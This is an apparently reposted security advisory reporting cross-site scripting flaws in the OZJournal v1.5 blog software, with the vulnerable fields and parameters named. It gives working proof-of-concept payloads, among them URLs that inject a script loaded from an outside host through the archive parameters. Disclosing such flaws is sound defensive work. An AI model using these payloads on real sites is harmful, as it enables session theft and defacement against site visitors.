`OZJournal v1.5
Homepage:
http://ozjournals.awardspace.com/index.php
Affected files:
search input box
index.php
viewing archives
show comment page
----------------------------------------
XSS vulnerability via search input box:
Data isn't properly sanatized before being displayed. For a PoC in the search input box put: <script>alert('Hello')</script>. A full path disclosure error also will occur with this example due to functions.php.
Warning: preg_match(): Unknown modifier 'c' in /home/www/site/functions.php on line 570
--------------------------------
XSS vuln viewing archives by month via m variable.
PoC:
http://example.com/index.php?show=archives&y=2006&m=<script%20src=http://www.youfucktard.com/xss.js></script>
XSS vuln viewing archives by category via c variable:
http://example.com/index.php?show=archives&c=http://ozjournals.awardspace.com/index.php?show=archives&c=<script%20src=http://www.youfucktard.com/xss.js></script>
-------------------------------------
XSS vuln after submitting a comment.
Data in the input name box isn't sanatized on the show post comments screen after submitting a comment.
However, when displaying comments in the journal everything is properly sanatized and filtered. For a PoC
in the name input box put:
<script>alert('Hello')</script>
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation